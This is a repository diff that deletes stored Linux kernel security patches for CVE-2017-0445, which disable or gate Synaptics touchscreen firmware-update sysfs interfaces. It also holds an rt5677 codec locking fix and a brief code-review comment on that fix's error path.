- struct delayed_work check_hp_mic_work;
-diff --git a/sound/soc/codecs/rt5677_ioctl.c b/sound/soc/codecs/rt5677_ioctl.c
-index f5ee880..d3262f5 100644
---- a/sound/soc/codecs/rt5677_ioctl.c
-+++ b/sound/soc/codecs/rt5677_ioctl.c
-@@ -151,16 +151,22 @@ int rt5677_ioctl_common(struct snd_hwdep *hw, struct file *file,
-
- case RT_WRITE_CODEC_DSP_IOCTL:
- case RT_WRITE_CODEC_DSP_IOCTL_COMPAT:
-+ mutex_lock(&rt5677->vad_lock);
- if (!rt5677->model_buf || rt5677->model_len < size) {
- vfree(rt5677->model_buf);
- rt5677->model_len = 0;
- rt5677->model_buf = vmalloc(size);
-- if (!rt5677->model_buf)
-+ if (!rt5677->model_buf) {
-+ mutex_unlock(&rt5677->vad_lock);
- return -ENOMEM;
-+ }
- }
-- if (copy_from_user(rt5677->model_buf, rt_codec.buf, size))
-+ if (copy_from_user(rt5677->model_buf, rt_codec.buf, size)) {
-+ mutex_unlock(&rt5677->vad_lock);
- return -EFAULT;
-+ }
- rt5677->model_len = size;
-+ mutex_unlock(&rt5677->vad_lock);
- return 0;
-
- default:
---
-cgit v1.1
-
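Review bot: When the existing buffer is reused (the `model_len < size` branch is not taken) and `copy_from_user()` fails part-way, the `-EFAULT` path in rt5677_ioctl.c leaves `rt5677->model_len` at its old value while `model_buf` now holds a mix of old and new bytes. Any later reader that takes `vad_lock` and trusts `model_len` would then consume a partially overwritten model; whether such a reader exists is outside this hunk, so treat this as something to confirm. Clearing the length before the copy keeps the pair consistent on failure: add `rt5677->model_len = 0;` immediately before the `if (copy_from_user(...))` line. The validation of `size` that feeds `vmalloc(size)` is also not visible here, since rt5677_ioctl_common starts before the hunk.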
diff --git a/Patches/Linux_CVEs/CVE-2017-0445/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0445/ANY/0001.patch
deleted file mode 100644
index 0a9424c6..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0445/ANY/0001.patch
+++ /dev/null
@@ -1,34 +0,0 @@
-From 773179468893965c2b81aa7ffe3722b6868ef749 Mon Sep 17 00:00:00 2001
-From: Andrew Chant
-Date: Fri, 2 Dec 2016 21:56:40 -0800
-Subject: [PATCH] input: touchscreen: disable generic update i/f
-
-Disable the generic touchscreen firmware update hook.
-The generic touchscreen firmware update driver has
-security flaws and is not necessary for Marlin touchscreen
-firmware updates.
-
-synaptics_dsx_htc_2.6 still attempts firmware updates
-via request_firmware on boot with this disabled.
-
-BUG: 32917445
-BUG: 32919560
-BUG: 32769717
-Change-Id: I272a1d1aba16b53647f2dde9dc7ff8b306179b43
-Signed-off-by: Andrew Chant
----
- drivers/input/touchscreen/Kconfig | 1 -
- 1 file changed, 1 deletion(-)
-
-diff --git a/drivers/input/touchscreen/Kconfig b/drivers/input/touchscreen/Kconfig
-index b633d17ea8b18..1e7ce91810f41 100644
---- a/drivers/input/touchscreen/Kconfig
-+++ b/drivers/input/touchscreen/Kconfig
-@@ -1020,7 +1020,6 @@ config SECURE_TOUCH
-
- config TOUCHSCREEN_TOUCH_FW_UPDATE
- tristate "Touchscreen firmware update"
-- default y
- help
- Say Y here to support touch firmware update
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0445/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2017-0445/ANY/0002.patch
deleted file mode 100644
index 4db4d28a..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0445/ANY/0002.patch
+++ /dev/null
@@ -1,373 +0,0 @@ -From 367e64520dba1652d8f6d0ac1ebda3cab0f9e374 Mon Sep 17 00:00:00 2001 -From: Andrew Chant -Date: Tue, 6 Dec 2016 17:03:07 -0800 -Subject: [PATCH] input: synaptics_dsx: remove update sysfs entries - -Remove sysfs entrypoints to fw_update module. -Also fixes request_firmware firmware update path. - -BUG: 32769717 -Change-Id: Iab7ff456288a18be71636b84c8e3008390c0d872 -Signed-off-by: Andrew Chant ---- - .../touchscreen/synaptics_dsx_htc_2.6/Kconfig | 10 ++++ - .../synaptics_dsx_fw_update.c | 53 ++++++++++++++++++++-- - 2 files changed, 60 insertions(+), 3 deletions(-) - -diff --git a/drivers/input/touchscreen/synaptics_dsx_htc_2.6/Kconfig b/drivers/input/touchscreen/synaptics_dsx_htc_2.6/Kconfig -index 30c64910d7dd5..60f536c8ee150 100644 ---- a/drivers/input/touchscreen/synaptics_dsx_htc_2.6/Kconfig -+++ b/drivers/input/touchscreen/synaptics_dsx_htc_2.6/Kconfig -@@ -59,6 +59,16 @@ config TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_HTC_v26 - To compile this driver as a module, choose M here: the - module will be called synaptics_dsx_fw_update. - -+config TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_SYSFS_HTC_v26 -+ bool "Synaptics DSX firmware update sysfs attributes" -+ depends on TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_HTC_v26 -+ help -+ Say Y here to enable support for sysfs attributes for -+ performing firmware update in a development environment. -+ This does not affect the core or other subsystem attributes. -+ -+ If unsure, say N. 
-+ - config TOUCHSCREEN_SYNAPTICS_DSX_TEST_REPORTING_HTC_v26 - tristate "Synaptics DSX v2.6 test reporting module" - depends on TOUCHSCREEN_SYNAPTICS_DSX_CORE_HTC_v26 -diff --git a/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_fw_update.c b/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_fw_update.c -index f7d5dbdd69b53..aff460c13f257 100644 ---- a/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_fw_update.c -+++ b/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_fw_update.c -@@ -140,6 +140,7 @@ static int fwu_do_reflash(void); - - static int fwu_recovery_check_status(void); - -+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_SYSFS_HTC_v26 - static ssize_t fwu_sysfs_show_image(struct file *data_file, - struct kobject *kobj, struct bin_attribute *attributes, - char *buf, loff_t pos, size_t count); -@@ -192,6 +193,7 @@ static ssize_t fwu_sysfs_guest_code_block_count_show(struct device *dev, - - static ssize_t fwu_sysfs_write_guest_code_store(struct device *dev, - struct device_attribute *attr, const char *buf, size_t count); -+#endif - - enum f34_version { - F34_V0 = 0, -@@ -708,6 +710,7 @@ struct synaptics_rmi4_fwu_handle { - #endif - }; - -+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_SYSFS_HTC_v26 - static struct bin_attribute dev_attr_data = { - .attr = { - .name = "data", -@@ -765,11 +768,15 @@ static struct device_attribute attrs[] = { - synaptics_rmi4_show_error, - fwu_sysfs_write_guest_code_store), - }; -+#endif - - static struct synaptics_rmi4_fwu_handle *fwu; - - DECLARE_COMPLETION(fwu_remove_complete); -+ -+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_SYSFS_HTC_v26 - DEFINE_MUTEX(fwu_sysfs_mutex); -+#endif - - /* Check offset + size <= bound. true if in bounds, false otherwise. 
*/ - static bool in_bounds(unsigned long offset, unsigned long size, -@@ -923,6 +930,7 @@ static int fwu_f51_force_data_init(void) - } - #endif - -+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_SYSFS_HTC_v26 - static int fwu_allocate_read_config_buf(unsigned int count) - { - struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data; -@@ -942,6 +950,7 @@ static int fwu_allocate_read_config_buf(unsigned int count) - - return 0; - } -+#endif - - static void fwu_compare_partition_tables(void) - { -@@ -2471,6 +2480,7 @@ static int fwu_write_f34_blocks(unsigned char *block_ptr, - return retval; - } - -+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_SYSFS_HTC_v26 - static int fwu_read_f34_v7_blocks(unsigned short block_cnt, - unsigned char command) - { -@@ -2624,6 +2634,7 @@ static int fwu_read_f34_blocks(unsigned short block_cnt, unsigned char cmd) - - return retval; - } -+#endif - - static int fwu_get_image_firmware_id(unsigned int *fw_id) - { -@@ -2645,7 +2656,7 @@ static int fwu_get_image_firmware_id(unsigned int *fw_id) - } - - strptr += 2; -- firmware_id = kzalloc(MAX_FIRMWARE_ID_LEN, GFP_KERNEL); -+ firmware_id = kzalloc(MAX_FIRMWARE_ID_LEN + 1, GFP_KERNEL); - if (!firmware_id) { - dev_err(rmi4_data->pdev->dev.parent, - "%s: Failed to alloc mem for firmware_id\n", -@@ -3032,6 +3043,7 @@ static int fwu_check_ui_configuration_size(void) - return 0; - } - -+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_SYSFS_HTC_v26 - static int fwu_check_dp_configuration_size(void) - { - unsigned short block_count; -@@ -3065,6 +3077,7 @@ static int fwu_check_pm_configuration_size(void) - - return 0; - } -+#endif - - #ifndef SYNA_SIMPLE_UPDATE - static int fwu_check_bl_configuration_size(void) -@@ -3085,6 +3098,7 @@ static int fwu_check_bl_configuration_size(void) - } - #endif - -+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_SYSFS_HTC_v26 - static int fwu_check_guest_code_size(void) - { - unsigned short block_count; -@@ -3100,6 +3114,7 @@ static int 
fwu_check_guest_code_size(void) - - return 0; - } -+#endif - - static int fwu_erase_configuration(void) - { -@@ -3199,6 +3214,7 @@ static int fwu_erase_utility_parameter(void) - } - #endif - -+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_SYSFS_HTC_v26 - static int fwu_erase_guest_code(void) - { - int retval; -@@ -3222,6 +3238,7 @@ static int fwu_erase_guest_code(void) - - return 0; - } -+#endif - - static int fwu_erase_all(void) - { -@@ -3275,7 +3292,7 @@ static int fwu_erase_all(void) - - #ifndef SYNA_SIMPLE_UPDATE - if (fwu->flash_properties.has_disp_config && -- fwu->img.contains_disp_config) { -+ fwu->img.contains_disp_config) { - fwu->config_area = DP_CONFIG_AREA; - retval = fwu_erase_configuration(); - if (retval < 0) -@@ -3424,6 +3441,7 @@ static int fwu_write_ui_configuration(void) - return fwu_write_configuration(); - } - -+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_SYSFS_HTC_v26 - static int fwu_write_dp_configuration(void) - { - fwu->config_area = DP_CONFIG_AREA; -@@ -3443,6 +3461,7 @@ static int fwu_write_pm_configuration(void) - - return fwu_write_configuration(); - } -+#endif - - #ifndef SYNA_SIMPLE_UPDATE - static int fwu_write_flash_configuration(void) -@@ -3476,6 +3495,7 @@ static int fwu_write_flash_configuration(void) - } - #endif - -+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_SYSFS_HTC_v26 - static int fwu_write_guest_code(void) - { - int retval; -@@ -3490,6 +3510,7 @@ static int fwu_write_guest_code(void) - - return 0; - } -+#endif - - static int fwu_write_lockdown(void) - { -@@ -3998,6 +4019,7 @@ static int fwu_do_reflash(void) - return retval; - } - -+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_SYSFS_HTC_v26 - static int fwu_do_read_config(void) - { - int retval; -@@ -4076,6 +4098,7 @@ static int fwu_do_read_config(void) - - return retval; - } -+#endif - - static int fwu_do_lockdown_v7(void) - { -@@ -4212,6 +4235,7 @@ static int fwu_do_restore_f51_cal_data(void) - } - #endif - -+#ifdef 
CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_SYSFS_HTC_v26 - static int fwu_start_write_guest_code(void) - { - int retval; -@@ -4417,6 +4441,7 @@ static int fwu_start_write_config(void) - - return retval; - } -+#endif - - static int fwu_start_reflash(void) - { -@@ -4472,6 +4497,7 @@ static int fwu_start_reflash(void) - "%s: Firmware image size = %d\n", - __func__, (unsigned int)fw_entry->size); - fwu->image = fw_entry->data; -+ fwu->image_size = fw_entry->size; - } - - retval = fwu_parse_image_info(); -@@ -4691,6 +4717,7 @@ static int fwu_recovery_check_status(void) - return 0; - } - -+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_SYSFS_HTC_v26 - static int fwu_recovery_erase_completion(void) - { - int retval; -@@ -4965,6 +4992,7 @@ static int fwu_start_recovery(void) - - return retval; - } -+#endif - - #ifdef HTC_FEATURE - static int fwu_do_write_config(uint8_t *config_data) -@@ -5219,8 +5247,10 @@ static void fwu_startup_fw_update_work(struct work_struct *work) - } - #endif - -+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_SYSFS_HTC_v26 - /* Prevent sysfs operations during initial update. 
*/ - mutex_lock(&fwu_sysfs_mutex); -+#endif - - #ifdef HTC_FEATURE - wake_lock(&fwu->fwu_wake_lock); -@@ -5236,11 +5266,14 @@ static void fwu_startup_fw_update_work(struct work_struct *work) - #else - synaptics_fw_updater(NULL); - #endif -+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_SYSFS_HTC_v26 - mutex_unlock(&fwu_sysfs_mutex); -+#endif - return; - } - #endif - -+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_SYSFS_HTC_v26 - static ssize_t fwu_sysfs_show_image(struct file *data_file, - struct kobject *kobj, struct bin_attribute *attributes, - char *buf, loff_t pos, size_t count) -@@ -5674,6 +5707,7 @@ static ssize_t fwu_sysfs_write_guest_code_store(struct device *dev, - mutex_unlock(&fwu_sysfs_mutex); - return retval; - } -+#endif - - static void synaptics_rmi4_fwu_attn(struct synaptics_rmi4_data *rmi4_data, - unsigned char intr_mask) -@@ -5690,7 +5724,9 @@ static void synaptics_rmi4_fwu_attn(struct synaptics_rmi4_data *rmi4_data, - static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data) - { - int retval; -+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_SYSFS_HTC_v26 - unsigned char attr_count; -+#endif - struct pdt_properties pdt_props; - - if (fwu) { -@@ -5758,6 +5794,7 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data) - fwu->do_lockdown = DO_LOCKDOWN; - fwu->initialized = true; - -+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_SYSFS_HTC_v26 - retval = sysfs_create_bin_file(&rmi4_data->input_dev->dev.kobj, - &dev_attr_data); - if (retval < 0) { -@@ -5778,6 +5815,7 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data) - goto exit_remove_attrs; - } - } -+#endif - - #ifdef DO_STARTUP_FW_UPDATE - #ifdef HTC_FEATURE -@@ -5800,13 +5838,19 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data) - - return 0; - -+#if defined(CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_SYSFS_HTC_v26) || \ -+ defined(F51_DISCRETE_FORCE) - exit_remove_attrs: -+#endif -+ -+#ifdef 
CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_SYSFS_HTC_v26 - for (attr_count--; attr_count >= 0; attr_count--) { - sysfs_remove_file(&rmi4_data->input_dev->dev.kobj, - &attrs[attr_count].attr); - } - - sysfs_remove_bin_file(&rmi4_data->input_dev->dev.kobj, &dev_attr_data); -+#endif - - exit_free_mem: - kfree(fwu->image_name); -@@ -5821,8 +5865,9 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data) - - static void synaptics_rmi4_fwu_remove(struct synaptics_rmi4_data *rmi4_data) - { -+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_SYSFS_HTC_v26 - unsigned char attr_count; -- -+#endif - if (!fwu) - goto exit; - -@@ -5835,12 +5880,14 @@ static void synaptics_rmi4_fwu_remove(struct synaptics_rmi4_data *rmi4_data) - #endif - #endif - -+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_SYSFS_HTC_v26 - for (attr_count = 0; attr_count < ARRAY_SIZE(attrs); attr_count++) { - sysfs_remove_file(&rmi4_data->input_dev->dev.kobj, - &attrs[attr_count].attr); - } - - sysfs_remove_bin_file(&rmi4_data->input_dev->dev.kobj, &dev_attr_data); -+#endif - - #ifdef F51_DISCRETE_FORCE - kfree(fwu->cal_data); diff --git a/Patches/Linux_CVEs/CVE-2017-0445/ANY/0003.patch b/Patches/Linux_CVEs/CVE-2017-0445/ANY/0003.patch deleted file mode 100644 index c2e986ef..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0445/ANY/0003.patch +++ /dev/null 
@@ -1,210 +0,0 @@ -From 2615c5f302441568e6dd20007bc5246d72837e80 Mon Sep 17 00:00:00 2001 -From: Andrew Chant -Date: Tue, 6 Dec 2016 19:19:26 -0800 -Subject: [PATCH] input: synaptics_dsx: remove update sysfs entries - -Remove sysfs entrypoints to fw_update module. - -BUG: 32769717 -Change-Id: I425761af84ed5c31cc5902b4f49c4981a49f3af0 -Signed-off-by: Andrew Chant ---- - drivers/input/touchscreen/synaptics_dsx25/Kconfig | 10 ++++++++ - .../synaptics_dsx25/synaptics_dsx_fw_update.c | 27 ++++++++++++++++++++-- - 2 files changed, 35 insertions(+), 2 deletions(-) - -diff --git a/drivers/input/touchscreen/synaptics_dsx25/Kconfig b/drivers/input/touchscreen/synaptics_dsx25/Kconfig -index 36661fc9d6a2d..218a6c3c96467 100644 ---- a/drivers/input/touchscreen/synaptics_dsx25/Kconfig -+++ b/drivers/input/touchscreen/synaptics_dsx25/Kconfig -@@ -59,6 +59,16 @@ config TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE - To compile this driver as a module, choose M here: the - module will be called synaptics_dsx_fw_update. - -+config TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS -+ bool "Synaptics DSX firmware update sysfs attributes" -+ depends on TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE -+ help -+ Say Y here to enable support for sysfs attributes for -+ performing firmware update in a development environment. -+ This does not affect the core or other subsystem attributes. -+ -+ If unsure, say N. 
-+ - config TOUCHSCREEN_SYNAPTICS_DSX25_ACTIVE_PEN - tristate "Synaptics DSX active pen module" - depends on TOUCHSCREEN_SYNAPTICS25_DSX_CORE -diff --git a/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_fw_update.c b/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_fw_update.c -index 323f65891b458..8cad4d3b3a9d9 100755 ---- a/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_fw_update.c -+++ b/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_fw_update.c -@@ -105,6 +105,7 @@ static int fwu_do_reflash(void); - - static int fwu_recovery_check_status(void); - -+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS - static ssize_t fwu_sysfs_show_image(struct file *data_file, - struct kobject *kobj, struct bin_attribute *attributes, - char *buf, loff_t pos, size_t count); -@@ -157,6 +158,7 @@ static ssize_t fwu_sysfs_guest_code_block_count_show(struct device *dev, - - static ssize_t fwu_sysfs_write_guest_code_store(struct device *dev, - struct device_attribute *attr, const char *buf, size_t count); -+#endif - - enum f34_version { - F34_V0 = 0, -@@ -595,6 +597,7 @@ struct synaptics_rmi4_fwu_handle { - struct work_struct fwu_work; - }; - -+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS - static struct bin_attribute dev_attr_data = { - .attr = { - .name = "data", -@@ -652,12 +655,14 @@ static struct device_attribute attrs[] = { - synaptics_rmi4_show_error, - fwu_sysfs_write_guest_code_store), - }; -+#endif - - static struct synaptics_rmi4_fwu_handle *fwu; - - DECLARE_COMPLETION(dsx_fwu_remove_complete); -+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS - DEFINE_MUTEX(fwu_sysfs_mutex); -- -+#endif - static bool tp_2k_panel = false; - /** - * early_param: Parse system early startup parameters. 
-@@ -3057,6 +3062,7 @@ static int fwu_do_reflash(void) - return retval; - } - -+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS - static int fwu_do_read_config(void) - { - int retval; -@@ -3136,6 +3142,7 @@ static int fwu_do_read_config(void) - - return retval; - } -+#endif - - static int fwu_do_lockdown(void) - { -@@ -3173,6 +3180,7 @@ static int fwu_do_lockdown(void) - return retval; - } - -+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS - static int fwu_start_write_guest_code(void) - { - int retval; -@@ -3348,6 +3356,7 @@ static int fwu_start_write_config(void) - - return retval; - } -+#endif - - static void synaptics_refresh_configid(void) - { -@@ -3584,6 +3593,7 @@ static int fwu_recovery_check_status(void) - return 0; - } - -+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS - static int fwu_recovery_erase_all(void) - { - int retval; -@@ -3778,6 +3788,7 @@ static int fwu_start_recovery(void) - - return retval; - } -+#endif - - int synaptics_dsx25_fw_updater(const unsigned char *fw_data) - { -@@ -3838,6 +3849,7 @@ static void fwu_startup_fw_update_work(struct work_struct *work) - } - #endif - -+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS - static ssize_t fwu_sysfs_show_image(struct file *data_file, - struct kobject *kobj, struct bin_attribute *attributes, - char *buf, loff_t pos, size_t count) -@@ -4236,6 +4248,7 @@ static ssize_t fwu_sysfs_write_guest_code_store(struct device *dev, - mutex_unlock(&fwu_sysfs_mutex); - return retval; - } -+#endif - - static void synaptics_rmi4_fwu_attn(struct synaptics_rmi4_data *rmi4_data, - unsigned char intr_mask) -@@ -4252,7 +4265,9 @@ static void synaptics_rmi4_fwu_attn(struct synaptics_rmi4_data *rmi4_data, - static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data) - { - int retval; -+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS - unsigned char attr_count; -+#endif - struct pdt_properties pdt_props; - - if (fwu) { -@@ -4319,6 +4334,7 @@ static int 
synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data) - &fwu->fwu_work); - #endif - -+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS - retval = sysfs_create_bin_file(&rmi4_data->input_dev->dev.kobj, - &dev_attr_data); - if (retval < 0) { -@@ -4339,9 +4355,11 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data) - goto exit_remove_attrs; - } - } -+#endif - - return 0; - -+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS - exit_remove_attrs: - for (attr_count--; attr_count >= 0; attr_count--) { - sysfs_remove_file(&rmi4_data->input_dev->dev.kobj, -@@ -4349,8 +4367,9 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data) - } - - sysfs_remove_bin_file(&rmi4_data->input_dev->dev.kobj, &dev_attr_data); -- - exit_destroy_work: -+#endif -+ - #ifdef DO_STARTUP_FW_UPDATE - cancel_work_sync(&fwu->fwu_work); - flush_workqueue(fwu->fwu_workqueue); -@@ -4370,7 +4389,9 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data) - - static void synaptics_rmi4_fwu_remove(struct synaptics_rmi4_data *rmi4_data) - { -+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS - unsigned char attr_count; -+#endif - - if (!fwu) - goto exit; -@@ -4381,12 +4402,14 @@ static void synaptics_rmi4_fwu_remove(struct synaptics_rmi4_data *rmi4_data) - destroy_workqueue(fwu->fwu_workqueue); - #endif - -+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS - for (attr_count = 0; attr_count < ARRAY_SIZE(attrs); attr_count++) { - sysfs_remove_file(&rmi4_data->input_dev->dev.kobj, - &attrs[attr_count].attr); - } - - sysfs_remove_bin_file(&rmi4_data->input_dev->dev.kobj, &dev_attr_data); -+#endif - - kfree(fwu->read_config_buf); - kfree(fwu->image_name); diff --git a/Patches/Linux_CVEs/CVE-2017-0445/ANY/0004.patch b/Patches/Linux_CVEs/CVE-2017-0445/ANY/0004.patch deleted file mode 100644 index ed4d450e..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0445/ANY/0004.patch +++ /dev/null 
@@ -1,181 +0,0 @@ -From fe160e51f02ee5db529c2e84ac8364c89cce005e Mon Sep 17 00:00:00 2001 -From: Andrew Chant -Date: Tue, 6 Dec 2016 20:59:01 -0800 -Subject: [PATCH] input: synaptics_dsx: remove some sysfs nodes. - -Remove most sysfs entrypoints to fw_update module. -Retains check_fw, which is triggered from an -init script. - -BUG: 32769717 -Change-Id: I710cb37a8b5382dce7aa6a1d8748be5853a18a7a -Signed-off-by: Andrew Chant ---- - drivers/input/touchscreen/Kconfig | 10 ++++++++++ - drivers/input/touchscreen/synaptics_fw_update.c | 20 ++++++++++++++++++++ - 2 files changed, 30 insertions(+) - -diff --git a/drivers/input/touchscreen/Kconfig b/drivers/input/touchscreen/Kconfig -index a42fea5862af2..64266998c2290 100644 ---- a/drivers/input/touchscreen/Kconfig -+++ b/drivers/input/touchscreen/Kconfig -@@ -1019,6 +1019,16 @@ config TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE - To compile this driver as a module, choose M here: the - module will be called synaptics_dsx_fw_update. - -+config TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_EXTRA_SYSFS -+ bool "Synaptics DSX firmware update extra sysfs attributes" -+ depends on TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE -+ help -+ Say Y here to enable support for extra sysfs attributes -+ supporting firmware update in a development environment. -+ This does not affect the core or other subsystem attributes. -+ -+ If unsure, say N. 
-+ - config SECURE_TOUCH - bool "Secure Touch" - depends on (TOUCHSCREEN_ATMEL_MXT || TOUCHSCREEN_SYNAPTICS_I2C_RMI4 || \ -diff --git a/drivers/input/touchscreen/synaptics_fw_update.c b/drivers/input/touchscreen/synaptics_fw_update.c -index 8891f1c836684..360e455a5a51b 100644 ---- a/drivers/input/touchscreen/synaptics_fw_update.c -+++ b/drivers/input/touchscreen/synaptics_fw_update.c -@@ -1331,6 +1331,7 @@ static int fwu_do_write_config(void) - return retval; - } - -+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_EXTRA_SYSFS - static int fwu_start_write_config(void) - { - int retval; -@@ -1383,6 +1384,7 @@ static int fwu_start_write_config(void) - - return retval; - } -+#endif - - static int fwu_do_write_lockdown(bool reset) - { -@@ -1430,6 +1432,7 @@ static int fwu_do_write_lockdown(bool reset) - return retval; - } - -+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_EXTRA_SYSFS - static int fwu_start_write_lockdown(void) - { - if (parse_header()) -@@ -1533,6 +1536,7 @@ static int fwu_do_read_config(void) - exit: - return retval; - } -+#endif - - static int fwu_do_reflash(void) - { -@@ -1767,6 +1771,7 @@ int synaptics_fw_updater(void) - } - EXPORT_SYMBOL(synaptics_fw_updater); - -+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_EXTRA_SYSFS - static ssize_t fwu_sysfs_show_image(struct file *data_file, - struct kobject *kobj, struct bin_attribute *attributes, - char *buf, loff_t pos, size_t count) -@@ -2021,6 +2026,7 @@ static ssize_t fwu_sysfs_write_lockdown_store(struct device *dev, - mutex_unlock(&fwu_sysfs_mutex); - return retval; - } -+#endif - - static ssize_t fwu_sysfs_check_fw_store(struct device *dev, - struct device_attribute *attr, const char *buf, size_t count) -@@ -2044,6 +2050,7 @@ static ssize_t fwu_sysfs_check_fw_store(struct device *dev, - return count; - } - -+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_EXTRA_SYSFS - static ssize_t fwu_sysfs_write_config_store(struct device *dev, - struct device_attribute *attr, const char *buf, size_t 
count) - { -@@ -2265,6 +2272,7 @@ static ssize_t fwu_sysfs_package_id_show(struct device *dev, - (pkg_id[1] << 8) | pkg_id[0], - (pkg_id[3] << 8) | pkg_id[2]); - } -+#endif - - static int synaptics_rmi4_debug_dump_info(struct seq_file *m, void *v) - { -@@ -2298,6 +2306,7 @@ static void synaptics_rmi4_fwu_attn(struct synaptics_rmi4_data *rmi4_data, - return; - } - -+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_EXTRA_SYSFS - static struct bin_attribute dev_attr_data = { - .attr = { - .name = "data", -@@ -2307,8 +2316,10 @@ static struct bin_attribute dev_attr_data = { - .read = fwu_sysfs_show_image, - .write = fwu_sysfs_store_image, - }; -+#endif - - static struct device_attribute attrs[] = { -+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_EXTRA_SYSFS - __ATTR(fw_name, S_IRUGO | S_IWUSR | S_IWGRP, - fwu_sysfs_image_name_show, - fwu_sysfs_image_name_store), -@@ -2318,9 +2329,11 @@ static struct device_attribute attrs[] = { - __ATTR(update_fw, S_IWUSR | S_IWGRP, - NULL, - fwu_sysfs_do_reflash_store), -+#endif - __ATTR(check_fw, S_IWUSR | S_IWGRP, - NULL, - fwu_sysfs_check_fw_store), -+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_EXTRA_SYSFS - __ATTR(writeconfig, S_IWUSR | S_IWGRP, - NULL, - 